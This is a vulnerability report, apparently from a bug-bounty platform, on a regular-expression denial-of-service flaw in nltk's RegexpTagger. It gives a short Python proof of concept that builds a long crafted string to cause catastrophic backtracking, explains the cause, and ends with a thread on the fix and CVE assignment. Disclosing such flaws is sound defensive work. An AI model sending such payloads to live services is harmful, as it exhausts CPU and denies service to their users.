Inefficient Regular Expression Complexity in nltk/nltk
Reported on
Dec 7th 2021
Description
nltk
is vulnerable to ReDoS attack because of ^-?[0-9]+(.[0-9]+)?$
regex. If attacker succeeds to use malicious payload against RegexpTagger
used in function get_pos_tagger and malt_regex_tagger, it will cause a nasty DoS.
Proof of Concept
// PoC.py
import re, time
pattern = re.compile("^-?[0-9]+(.[0-9]+)?$")
s = "-"
s += "0" * 50000
s += "q"
t = time.time()
print("searching...")
re.search(pattern, s)
print(time.time() - t)
On my new machine I needed only 50k characters to cause a 23+ seconds matching. For instance, in similar report to this project 160k characters were processed just in 3+ seconds.
Issue
The issue here is that in ^-?[0-9]+(.[0-9]+)?$
groups [0-9]+(.[0-9]+)
match each other, which causes a nasty backtracking in case of failure.
Impact
This vulnerability is capable of causing DoS due to CPU resources consumption.
Occurrences
@admin Greets, I was told that CVEs are assigned and published in roughly 1 hour after the fix. This repo used to assign CVEs for the same bug: https://nvd.nist.gov/vuln/detail/CVE-2021-3828 Has something changed?
@scara31 - thanks for getting in touch!
Our system no longer automatically assigns CVEs for certain CWE types, including Inefficient Regular Expression Complexity, however, if the maintainer (@tomaarsen) is happy, we can go ahead and publish a CVE for this report.
@admin Got it, thanks for reply! Then I will try to contact @tomaarsen
@scara31 Consider me contacted - I'm happy with the fix that is in place, but I must say that a fixed release has not yet been published. I'm unsure whether the CVE ought to only be created when such a release is out. If so, then we should wait. Otherwise, feel free to publish the CVE.
@tomaarsen That's good to hear, of course I can wait as much as you need!
The newest release has been published, containing this patch. Thanks again.
@tomaarsen It's great to hear it! Should I ask admin to assign the CVE, if you let me?